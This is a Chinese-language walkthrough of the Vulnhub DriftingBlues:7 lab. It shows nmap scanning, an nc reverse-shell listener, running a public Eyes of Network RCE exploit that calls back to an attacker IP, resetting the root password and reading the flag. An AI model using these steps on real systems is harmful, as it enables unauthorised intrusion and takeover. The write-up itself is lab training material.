Vulnhub-DriftingBlues:7

Vulnhub-DriftingBlues:7

目录


靶机下载地址:https://www.vulnhub.com/entry/driftingblues-7,680/

信息收集

扫描目标网段
nmap -sP 172.16.58.0/24 

Vulnhub-DriftingBlues:7

查看端口及服务
nmap -p- 172.16.58.135

Vulnhub-DriftingBlues:7

查看服务运行的版本
nmap -sV 172.16.58.135 

Vulnhub-DriftingBlues:7

访问网站

我们从打开的端口进行访问,先打开80端口试一下,结果直接来到一个登陆页面
Vulnhub-DriftingBlues:7
我们搜索一下Eyes of network,发现可以找到相应的exp
https://github.com/h4knet/eonrce
然后我们把它下载到kali里

git clone https://github.com/h4knet/eonrce.git  

Vulnhub-DriftingBlues:7

提升权限

接下来我们赋予权限

cd eonrce
chmod +x ./eonrce.py

Vulnhub-DriftingBlues:7
开启监听

nc -lvp 8888

Vulnhub-DriftingBlues:7

运行脚本

./eonrce.py https://172.16.58.135 -ip 172.16.58.129 -port 8888

Vulnhub-DriftingBlues:7
修改root密码

passwd root

Vulnhub-DriftingBlues:7
然后我们使用ssh连接靶机

ssh 172.16.58.135

输入我们刚才修改的密码
Vulnhub-DriftingBlues:7

查看文件发现flag.txt

ls -al

打开文件

cat flag.txt

Vulnhub-DriftingBlues:7
成功获取。

上一篇:vulnhub 之ShellDredd-1-Hannah


下一篇:VulnHub靶场篇11-Stapler-1